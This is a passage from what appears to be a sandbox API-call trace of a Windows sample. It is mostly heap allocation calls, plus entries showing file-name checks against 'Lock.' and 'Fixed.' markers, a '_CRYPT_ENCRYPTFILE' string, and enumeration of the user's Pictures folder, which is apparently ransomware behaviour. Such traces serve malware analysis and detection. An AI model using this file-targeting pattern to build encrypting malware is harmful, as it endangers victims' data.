hHeap=0x970000) returned 1 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d6Gq.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0248.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Gq.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0248.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gq.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0248.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0248.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0248.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0248.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0248.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0248.241] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0248.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0248.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0248.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12) returned 0x2e69928 [0248.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0248.241] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d6Gq.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0248.241] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Gq.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0248.242] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gq.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0248.242] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0248.242] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0248.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0248.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0248.243] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0248.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0248.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0248.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0248.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0248.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0248.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0248.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0248.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0248.243] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0248.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0248.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0248.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0248.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0248.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0248.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0248.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0248.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0248.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0248.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0248.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0248.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0248.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0248.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0248.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0248.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0248.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0248.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0248.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0248.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0248.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0248.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0248.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0248.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0248.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0248.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0248.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0248.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0248.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0248.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0248.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0248.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0248.250] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/d6Gq.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389ada20, ftCreationTime.dwHighDateTime=0x1d5e37c, ftLastAccessTime.dwLowDateTime=0x30250f60, ftLastAccessTime.dwHighDateTime=0x1d5e83a, 